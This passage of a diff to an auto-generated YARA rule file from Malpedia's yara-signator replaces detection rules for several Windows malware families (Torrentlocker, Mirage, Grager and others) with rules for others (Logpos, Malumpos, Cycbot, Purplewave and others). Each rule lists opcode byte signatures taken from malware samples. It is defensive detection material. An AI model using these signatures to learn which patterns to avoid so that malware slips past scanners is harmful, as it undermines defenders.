-		$sequence_7 = { b8???????? 8945d8 8d45d8 50 6800000000 ff35???????? 8d45e0 }
-		$sequence_8 = { 837d1400 0f8507000000 c7451401000000 837d1000 0f85aa020000 6802000080 6a00 }
-		$sequence_9 = { 53 55 56 8b742430 85f6 57 750a }
+		$sequence_0 = { c3 83f801 7405 83f802 }
+		$sequence_1 = { 6a01 68???????? ff15???????? 85c0 7510 6a78 50 }
+		$sequence_2 = { 6a02 e8???????? 83c430 85c0 }
+		$sequence_3 = { 41 81f9f1ff0000 7206 81e9f1ff0000 }
+		$sequence_4 = { 6a03 e8???????? 83c410 83f8ff 7404 a810 }
+		$sequence_5 = { 6685d2 75f1 8bcf 8bf7 668b11 83c102 }
+		$sequence_6 = { 7526 68400000f0 50 6a00 6a00 }
+		$sequence_7 = { 51 52 50 ff15???????? 85c0 7519 }
+		$sequence_8 = { 7415 81f9340000c0 7407 85c9 750e 33c0 }
+		$sequence_9 = { 85c0 740a c705????????ffffffff 8b15???????? 6a00 6a01 }
+		$sequence_10 = { 56 6a00 52 ff15???????? 5e 8bc7 }
+		$sequence_11 = { 751f ff15???????? 3d16000980 753d 68080000f0 }
+		$sequence_12 = { 6a18 6a00 6a00 68???????? ffd6 83f801 7526 }
+		$sequence_13 = { 750b 68???????? ff15???????? 8bc3 }
+		$sequence_14 = { 51 ff15???????? c705????????00000000 eb39 8b15???????? 6a0c }
+		$sequence_15 = { 8bc6 5e 5f c3 be04000000 }
 
 	condition:
-		7 of them and filesize < 737280
+		7 of them and filesize < 933888
 }
-rule MALPEDIA_Win_Mayberobot_Auto : FILE
+rule MALPEDIA_Win_Logpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c92428ca-450d-55ec-a6b0-19554a59efc9"
+		id = "738ffd15-c890-5ce3-8158-aad7627bd488"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mayberobot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mayberobot_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.logpos_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7a87fd7bc03b1a4ed615fd0a81f85d5bd0e66326980b2da4e2257c81318fa9fe"
+		logic_hash = "b0bb7c96824becdbd2b84481288798e82499176f0ad872177caf0cac7c2bcced"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120915,32 +120938,32 @@ rule MALPEDIA_Win_Mayberobot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec28 803d????????00 754c 488d0da8270100 }
-		$sequence_1 = { 45390a 7449 496312 4803d5 0fb60a 83e10f 4a0fbe843110440100 }
-		$sequence_2 = { 4885c0 7509 488d05233a0100 eb04 }
-		$sequence_3 = { 90 8bdf 8b05???????? 48895c2420 3bf0 7c36 4c8d3da9080100 }
-		$sequence_4 = { 4c8d058afb0000 488b4318 4839b838010000 750f 498b04d0 42387ce839 0f84d3000000 }
-		$sequence_5 = { 488d0d8a0b0100 e8???????? 4883c428 c3 }
-		$sequence_6 = { e8???????? 85c0 7420 4c8b442430 }
-		$sequence_7 = { 488d151fc50000 b903000000 4c8d050bc50000 e8???????? 488bd3 }
-		$sequence_8 = { 4183f90f 7779 428b8c8e78f80000 4803ce ffe1 660f73fa01 eb65 }
-		$sequence_9 = { 488bd1 488bc1 48c1f806 4c8d05b4060100 }
+		$sequence_0 = { 55 89e5 60 31c0 31c9 fc 8b7508 }
+		$sequence_1 = { e8???????? 894328 681c429282 ff33 ff736c }
+		$sequence_2 = { 83fa00 0f852c000000 8d4001 8945f8 8a00 }
+		$sequence_3 = { 48 83ec38 53 56 57 41 52 }
+		$sequence_4 = { 8b90d8000000 48 85d2 7410 48 394a08 7505 }
+		$sequence_5 = { c744241001000000 c744240c00000000 8b442450 89442414 }
+		$sequence_6 = { 8344242401 48 8344243001 837c243800 7406 48 }
+		$sequence_7 = { 4c 8d0570040000 49 8b88d8000000 48 }
+		$sequence_8 = { 83f82f 0f8549000000 8b45fc c680a360400000 8b45fc }
+		$sequence_9 = { 68ba917bf6 ff33 ff7370 53 e8???????? 89433c }
 
 	condition:
-		7 of them and filesize < 307200
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Mirage_Auto : FILE
+rule MALPEDIA_Win_Malumpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8a9a712-bc3f-5690-a472-64df6910b6ba"
+		id = "cd78d99d-ded9-59a9-a898-9ec39f928aa5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirage_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.malumpos_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "4e4af3295967c47493f17386d2e75f998cb14d5de0104dd5de1d503e94b2b46e"
+		logic_hash = "29cfae31eaa84f0f9fcc3ec276520376ec4d5f40c7104f5c7188971142f1d819"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120954,38 +120977,32 @@ rule MALPEDIA_Win_Mirage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6801000080 ff15???????? 85c0 7556 }
-		$sequence_1 = { 68???????? c745f804010000 ff75fc ff15???????? ff75fc }
-		$sequence_2 = { 0f84d1000000 57 e8???????? 8d7c0302 c70424???????? }
-		$sequence_3 = { 55 8bec b82c410000 e8???????? 53 56 }
-		$sequence_4 = { 8d45f4 50 53 68???????? c745f804010000 }
-		$sequence_5 = { e8???????? b8???????? 8d8d90feffff 50 8945e8 e8???????? 3bc3 }
-		$sequence_6 = { 0f86a0000000 bf14410000 8d8568bbffff 57 53 }
-		$sequence_7 = { 3bf3 0f85a9000000 381f 0f84a1000000 8d85ecfeffff 68???????? 50 }
-		$sequence_8 = { 6a01 6a06 c645ff01 ff7620 }
-		$sequence_9 = { 80c261 88543724 46 83fe1f 7ce8 80643e2400 }
-		$sequence_10 = { e9???????? 83fe04 0f859afdffff 56 8d4508 }
-		$sequence_11 = { 66218514fbffff b981000000 8dbd16fbffff c745ec01000000 f3ab 66ab 8d45f4 }
-		$sequence_12 = { e8???????? 83c410 56 8d8514fbffff 6a00 }
-		$sequence_13 = { ab ab 33c0 8dbda6ebffff 6689b5a4ebffff }
-		$sequence_14 = { c3 53 e8???????? 59 ff75f0 ff15???????? }
-		$sequence_15 = { ffd7 85c0 7547 8d8514fbffff 85c0 }
+		$sequence_0 = { 8b450c 3b38 731e 8bd9 }
+		$sequence_1 = { 59 56 8bf3 5e 56 }
+		$sequence_2 = { 8db408f8000000 8b4608 894568 3bc3 0f84d9000000 }
+		$sequence_3 = { 5a 66a9a02f fc f5 a1???????? 8b4015 6a04 }
+		$sequence_4 = { 5e 6685db 55 80c400 5d 56 }
+		$sequence_5 = { 59 7405 0d00000000 80ec00 }
+		$sequence_6 = { e8???????? 68???????? a3???????? ffd0 810d????????00200000 be???????? }
+		$sequence_7 = { 50 ff35???????? ff15???????? 817d6003010000 }
+		$sequence_8 = { 85c0 7446 8b400c 56 8b700c 68???????? 57 }
+		$sequence_9 = { 8d4520 50 ff15???????? 8d4520 }
 
 	condition:
-		7 of them and filesize < 1695744
+		7 of them and filesize < 542720
 }
-rule MALPEDIA_Win_Grager_Auto : FILE
+rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a70321f6-0139-51d8-af48-e9ddd6504bcd"
+		id = "0c279999-73dd-553b-a33f-fb7233640f4d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grager"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grager_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_kt3_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "d7bfc13c167a32046dd8425d3e3ec521c6bca90fe7d99db8d3d9dc97a5192526"
+		logic_hash = "43bd0b6c16f3b291b1fdceb004531872c299302c3bdde3bd6c507ecd76a92465"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120999,32 +121016,32 @@ rule MALPEDIA_Win_Grager_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48898534020000 4c8bc7 89853c020000 8b83d0200000 898520020000 c7852402000004000010 }
-		$sequence_1 = { 4c8d35a5e6ffff 0f1f440000 84c9 0f84d1010000 48ffc7 }
-		$sequence_2 = { bb01000000 e9???????? 8b4a08 33db 488bbfc8050000 81c113fcffff 488b7218 }
-		$sequence_3 = { 48890b 488d5308 488d4808 0f1102 e8???????? 488d058cdb0100 }
-		$sequence_4 = { 0fb605???????? 88814e050000 33c0 89814f050000 888153050000 33ff 4889b958050000 }
-		$sequence_5 = { 488bf9 488d1584a10100 b904000000 e8???????? 8bd3 488bcf }
-		$sequence_6 = { 4c8d0d45c80000 f20f101d???????? f20f100d???????? f20f59da }
-		$sequence_7 = { 4c8bc3 8d040e 488d8d44030000 898540030000 e8???????? 488d0dd61bfeff }
-		$sequence_8 = { 5d c3 8bc7 4883c470 415f 415e 415c }
-		$sequence_9 = { 4883ec20 8bd9 4c8d0d21eb0000 b904000000 4c8d050deb0000 488d1586c20000 e8???????? }
+		$sequence_0 = { 83c1ff 51 8b4df4 51 8b15???????? 52 }
+		$sequence_1 = { 51 e8???????? 83c404 8985e0fbffff 8b85e0fbffff 8985ecfbffff }
+		$sequence_2 = { 8b4dfc 0fbe5103 83fa3e 750f }
+		$sequence_3 = { 0f8408000000 0f8502000000 ebe9 c745dc00000000 }
+		$sequence_4 = { 8b55f8 2b55fc 8955f8 ebb7 8b4510 5f }
+		$sequence_5 = { 51 8b55f4 52 8d4de4 e8???????? 8b45e8 }
+		$sequence_6 = { 8b4dfc 83c10b 894df4 6a20 }
+		$sequence_7 = { 8d41fc 8b4c2404 2bc1 c3 6800000300 }
+		$sequence_8 = { 8dbdecfeffff 83c9ff 33c0 f2ae f7d1 83c1ff }
+		$sequence_9 = { 51 8b55f4 52 8d4de4 e8???????? }
 
 	condition:
-		7 of them and filesize < 487424
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Shipshape_Auto : FILE
+rule MALPEDIA_Win_Vendetta_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d9d684b1-6d28-5be9-a8dd-2a5e64ca3d0c"
+		id = "bcdb1310-b09c-513a-b41a-f75320f7a85e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shipshape_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vendetta_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "7ccbb1b47c0ba6ada9222b7cb4a37cd39065499a023a5e14e23083e9a19aaeee"
+		logic_hash = "5c2304aa47000d3a15dbc6575084e1756c9655c08eb53d8a6e39024d5b55c108"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121038,32 +121055,32 @@ rule MALPEDIA_Win_Shipshape_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d9424f8010000 c1e902 f3a5 8bc8 }
-		$sequence_1 = { 83f843 7c55 50 e8???????? }
-		$sequence_2 = { 8bf7 c1f805 83e61f 8d1c8560d54000 c1e603 }
-		$sequence_3 = { 83e11f 8b3cbd60d54000 8d3ccf eb05 bf???????? }
-		$sequence_4 = { f3a5 8bcd 8d942434030000 83e103 f3a4 8dbc2434020000 83c9ff }
-		$sequence_5 = { 808801c4400008 40 3dff000000 72f1 }
-		$sequence_6 = { 8bbc2410020000 83c9ff 33c0 8d54240c f2ae }
-		$sequence_7 = { 55 ff15???????? 5d 5b 81c440060000 c3 56 }
-		$sequence_8 = { 0f8430010000 8dbc2434010000 83c9ff 33c0 8d9424b4010000 }
-		$sequence_9 = { 52 50 e8???????? 8b4c241c 8b542418 }
+		$sequence_0 = { e9???????? c745e0e8924100 e9???????? c745e0d4924100 }
+		$sequence_1 = { 8bf1 83caff bf00040000 0fb60e }
+		$sequence_2 = { 40 c745ec7c994000 894df8 8945fc 64a100000000 8945e8 }
+		$sequence_3 = { 83ef01 75d4 f7d2 5f 8bc2 5e }
+		$sequence_4 = { 53 8d85f0f7ffff 50 56 ff15???????? }
+		$sequence_5 = { 84c0 0f843b010000 8d770c 6a2c }
+		$sequence_6 = { 8b85e0feffff 03b40518ffffff 03b0acb04100 03b5f8feffff }
+		$sequence_7 = { 238df4feffff 8b85e0feffff 03b40508ffffff 03b09cb04100 8bc3 03b5dcfeffff 01b5f8feffff }
+		$sequence_8 = { 3385ecfeffff 23c2 3385f8feffff 03f0 8b85e0feffff 03b40514ffffff 03b0a8b04100 }
+		$sequence_9 = { 7f0e 7c08 81fa00000080 7704 }
 
 	condition:
-		7 of them and filesize < 338386
+		7 of them and filesize < 296960
 }
-rule MALPEDIA_Win_Wonknu_Auto : FILE
+rule MALPEDIA_Win_Cycbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d7ac694-4f51-5dc8-9ab7-ab21fb225c95"
+		id = "aad0afc1-3e31-5a15-bed5-ae0a7936ed7d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wonknu_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cycbot_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e2ca1c08f61486fefbae5d981f9ebfcfe0d01c7d31c8206cfd558443ffe8ed91"
+		logic_hash = "653a5c288b88440ecab3bfd86c4c4b0d9e0fe555f9cf936dfb136b22da063d90"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121077,32 +121094,32 @@ rule MALPEDIA_Win_Wonknu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 6804140000 }
-		$sequence_1 = { f3a5 8bcb e8???????? 803b00 }
-		$sequence_2 = { 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
-		$sequence_3 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? }
-		$sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
-		$sequence_5 = { c6840550ffffff00 8d8550ffffff 50 e8???????? }
-		$sequence_6 = { 8bfc b901050000 f3a5 8bcb e8???????? }
-		$sequence_7 = { 8d7e28 57 ff15???????? 8b4608 }
-		$sequence_8 = { b901050000 f3a5 8bcb e8???????? 803b00 }
-		$sequence_9 = { eb08 c6840550ffffff00 8d8550ffffff 50 e8???????? }
+		$sequence_0 = { c705????????480f4200 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
+		$sequence_1 = { 895dfc 51 8d4db8 8945cc 895dc8 885db8 e8???????? }
+		$sequence_2 = { 741a ff7590 ff15???????? 85c0 750d ff7590 e8???????? }
+		$sequence_3 = { c68424c805000001 e8???????? 53 6a01 8d4c2474 8bf0 }
+		$sequence_4 = { e8???????? 83c418 6a00 8d842488000000 50 8d8c2494010000 51 }
+		$sequence_5 = { 48 7514 8d8550ffffff eb08 8d45c8 eb03 8d45a0 }
+		$sequence_6 = { 59 898580deffff 3bc7 7433 83bd9cdeffff10 8b8588deffff 7306 }
+		$sequence_7 = { 50 ff5110 8985b4fbffff 3bc7 0f857e010000 8b85a8fbffff 8b08 }
+		$sequence_8 = { 50 8d4c2430 e8???????? 8bf0 59 3bf3 752f }
+		$sequence_9 = { 33c0 66898580fbffff 6a04 5b 899dbcfbffff c785c0fbffff02000000 899dc4fbffff }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Comebacker_Auto : FILE
+rule MALPEDIA_Win_Minitypeframe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "19238c8d-fa63-54d2-9e85-3ef6a0f14568"
+		id = "dc23eb24-7d5a-5aeb-a61b-eb29d1fabf92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.comebacker_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minitypeframe_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "5042f5e1cb03a035d2e07683a701a487f9bff93086c3cbb30af6f5ad30fe783b"
+		logic_hash = "649cd851124eccf39a4d1794ac9ee18b8f663aea1274862230eac021ea9eebf8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121116,37 +121133,32 @@ rule MALPEDIA_Win_Comebacker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6683f809 7f04 0430 eb02 0437 }
-		$sequence_1 = { baa2000000 4c8d0d47450300 b910000000 448d42a0 }
-		$sequence_2 = { 0fb6c2 418b8c8270c30400 81e100ff0000 4433c1 453341fc 453343fc }
-		$sequence_3 = { b801000000 418bc8 0f45c8 488d05c0150300 488d1d11aa0300 85c9 }
-		$sequence_4 = { 4c8d0583520100 418d5216 e8???????? 85c0 750a b805000000 }
-		$sequence_5 = { 6690 e8???????? 48ffc3 8bf8 b84fecc44e f7ef }
-		$sequence_6 = { 89742440 48894598 c744245068000000 c744247004010000 }
-		$sequence_7 = { 0fb6c8 8bc5 8b948e70cf0400 48c1e808 0fb6c8 81e20000ff00 }
-		$sequence_8 = { e8???????? a1???????? 8b8da8f8ffff c1e00a d1e8 2bcf }
-		$sequence_9 = { 33d2 8a54242a 8adc 8b149538600410 }
-		$sequence_10 = { 5b c3 8b74241c 8b6c2414 85f6 }
-		$sequence_11 = { 6806020000 8d8d7ef7ffff 53 51 885de8 8945e9 }
-		$sequence_12 = { 52 ff15???????? a3???????? 85c0 7440 399de8e5ffff 750a }
-		$sequence_13 = { 8b0c8d38500410 33d3 8b3cbd38500410 81e1ff000000 }
-		$sequence_14 = { 74ab 8d8df4feffff 51 e8???????? 83c404 }
+		$sequence_0 = { 68???????? 6a0c 6a05 f3a4 e8???????? 8b8dd8000000 8d442430 }
+		$sequence_1 = { 83c414 85c0 750a 68bf080000 e9???????? 8b563c 8b7a04 }
+		$sequence_2 = { 8b4c2444 8039a6 0f8504010000 894c2464 8d4c2420 50 8d542420 }
+		$sequence_3 = { 8b1c9d78060910 81e300ff0000 33fb 8bda c1eb18 8b1c9d780e0910 81e3000000ff }
+		$sequence_4 = { e8???????? 83c40c 85c0 751a 6a4b 68???????? }
+		$sequence_5 = { 83c408 e9???????? 668b15???????? 66c744245c0200 52 ff15???????? 8d4c245c }
+		$sequence_6 = { c644240416 884c2405 c6442406ba c644240708 c644240898 c644240958 c644240ac1 }
+		$sequence_7 = { 51 52 e8???????? 8d442414 6a08 }
+		$sequence_8 = { 6854050000 68???????? 6a44 689b000000 6a14 e8???????? 83c418 }
+		$sequence_9 = { e8???????? 8bf8 83c404 3bfb 0f8e07020000 c74634d0210000 895e44 }
 
 	condition:
-		7 of them and filesize < 1429504
+		7 of them and filesize < 1589248
 }
-rule MALPEDIA_Win_Torrentlocker_Auto : FILE
+rule MALPEDIA_Win_Purplewave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7392e065-18c2-5313-a3d1-b30d3efcbeb2"
+		id = "f9a895ad-7289-518b-be54-7444bb9c0feb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.torrentlocker_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purplewave_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9e477f7e8b8247df899448f8dfaacbe7088b9d7adf1371f318f6d0bbdd12c5e7"
+		logic_hash = "2b8c8451c42e657113c26199005fb6974947a93818322a1c2e41a19d47cbd34a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121160,38 +121172,32 @@ rule MALPEDIA_Win_Torrentlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 83f801 7405 83f802 }
-		$sequence_1 = { 6a01 68???????? ff15???????? 85c0 7510 6a78 50 }
-		$sequence_2 = { 6a02 e8???????? 83c430 85c0 }
-		$sequence_3 = { 41 81f9f1ff0000 7206 81e9f1ff0000 }
-		$sequence_4 = { 6a03 e8???????? 83c410 83f8ff 7404 a810 }
-		$sequence_5 = { 6685d2 75f1 8bcf 8bf7 668b11 83c102 }
-		$sequence_6 = { 7526 68400000f0 50 6a00 6a00 }
-		$sequence_7 = { 51 52 50 ff15???????? 85c0 7519 }
-		$sequence_8 = { 7415 81f9340000c0 7407 85c9 750e 33c0 }
-		$sequence_9 = { 85c0 740a c705????????ffffffff 8b15???????? 6a00 6a01 }
-		$sequence_10 = { 56 6a00 52 ff15???????? 5e 8bc7 }
-		$sequence_11 = { 751f ff15???????? 3d16000980 753d 68080000f0 }
-		$sequence_12 = { 6a18 6a00 6a00 68???????? ffd6 83f801 7526 }
-		$sequence_13 = { 750b 68???????? ff15???????? 8bc3 }
-		$sequence_14 = { 51 ff15???????? c705????????00000000 eb39 8b15???????? 6a0c }
-		$sequence_15 = { 8bc6 5e 5f c3 be04000000 }
+		$sequence_0 = { 8bc1 c1f806 83e13f 6bc938 8b0485201e4900 80640828fe ff36 }
+		$sequence_1 = { 395914 7202 8b09 85f6 7410 8bd1 66833a3a }
+		$sequence_2 = { 59 8945c0 894dc4 8845b0 8945d8 894ddc }
+		$sequence_3 = { 8bec 8b5508 56 0fb67203 0fb64202 0fb64a01 c1e608 }
+		$sequence_4 = { 8d8d14ffffff e8???????? 68???????? 8d8d14ffffff c645fc20 e8???????? 50 }
+		$sequence_5 = { 51 8d4dd4 e8???????? ff734c e8???????? 59 3bc7 }
+		$sequence_6 = { 8b4e08 8902 894a04 895004 8911 8b4508 }
+		$sequence_7 = { 8d7b04 899d5cfdffff 33c0 c703???????? 83671000 c7471407000000 668907 }
+		$sequence_8 = { 8d8d14ffffff e8???????? 68???????? 8d8d14ffffff c645fc60 e8???????? 50 }
+		$sequence_9 = { e9???????? c3 8d4db0 e9???????? 8d4dbc e9???????? 8d8df8fbffff }
 
 	condition:
-		7 of them and filesize < 933888
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Dratzarus_Auto : FILE
+rule MALPEDIA_Win_Mapiget_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f9302a79-cbbb-577e-b0de-afebe2c4bd13"
+		id = "90931f84-8d97-5d03-9fd8-5157c4363161"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dratzarus_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mapiget_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "0edbbc2d6b5b6d721d8b3aacd843dcee1111d0fce65e6b309e3647e78f406b33"
+		logic_hash = "db2ad0ac6ed98d9fe4028516eb88a6adb15c290b65682d6ffe66f99e185c09f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121205,32 +121211,32 @@ rule MALPEDIA_Win_Dratzarus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7850002000016bc0b71 c78504020000128aa4ac c785080200000fa52ff4 c7850c020000421880f6 c7851002000023121336 }
-		$sequence_1 = { c7852802000014a20b6d c7852c02000012d8a499 c785300200000fa32ffa c78534020000420d80c7 c78538020000230a133f 66c7853c0200003e85 }
-		$sequence_2 = { 894511 66894515 8b05???????? 894517 0fb705???????? 6689451b }
-		$sequence_3 = { 6689440afe 6685c0 75ef 33c0 4883c9ff 488dbc2480060000 }
-		$sequence_4 = { 488d8de0000000 ba0f000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? }
-		$sequence_5 = { bf01000000 488bcb ff15???????? 8bc7 488b8c2460020000 4833cc e8???????? }
-		$sequence_6 = { c74424306133dc18 c7442434679eb315 66c744243876d4 c785e0000000eb6cf5c3 }
-		$sequence_7 = { c7450c4b676e4a c745101d29ecd4 c745142daca8b6 c64518f2 c785800000005e7c6d4c c78584000000747e6447 c785880000003134f9ef }
-		$sequence_8 = { 89842454020000 e8???????? b902000000 8d5701 4533c0 }
-		$sequence_9 = { 488bd0 ff15???????? 488d8da0020000 ba14000000 488905???????? e8???????? 488bd0 }
+		$sequence_0 = { 59 7433 8305????????20 8d0cbd20174100 8d9000010000 }
+		$sequence_1 = { 50 51 52 c744244044000000 c744244808e24000 c744246c01000000 ff15???????? }
+		$sequence_2 = { b97f000000 33c0 8d7c242a 66895c2428 66899c2428020000 }
+		$sequence_3 = { 8d7c2418 8b542468 f3ab 6689442444 8d442404 8d4c2414 50 }
+		$sequence_4 = { 8b4c2468 6a00 6a00 6a00 52 }
+		$sequence_5 = { 8d85f0feffff 52 8d8d70ffffff 50 8d95f0fdffff 51 }
+		$sequence_6 = { 6683bc45eefeffff0a 7517 8d95f0feffff 52 }
+		$sequence_7 = { c1e603 8d1c8520174100 8b048520174100 03c6 }
+		$sequence_8 = { 8b5c2408 55 83cdff 56 83fb02 57 be01000000 }
+		$sequence_9 = { 50 e8???????? 83c404 6689bc456effffff 8d8df0feffff }
 
 	condition:
-		7 of them and filesize < 1606656
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Minibus_Auto : FILE
+rule MALPEDIA_Win_Tonedeaf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a553746-bfda-50b5-bcb8-f78a742705c0"
+		id = "45b13e7e-c29b-5480-ade9-d6d61b9a86df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibus_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tonedeaf_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "633d35aef0c45891bfd2d9690e003786b5685be07a68c0378a6a4c37c3387340"
+		logic_hash = "ffe23054663c8cef941b8fef13d66b93a10d69fedb5bcac05b4afd2fa9414e88"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121244,32 +121250,32 @@ rule MALPEDIA_Win_Minibus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7cc3 eb25 85db 7421 83ceff 8bc6 }
-		$sequence_1 = { 0fb742fe 83f85c 7438 83f82f 7433 8b4de4 }
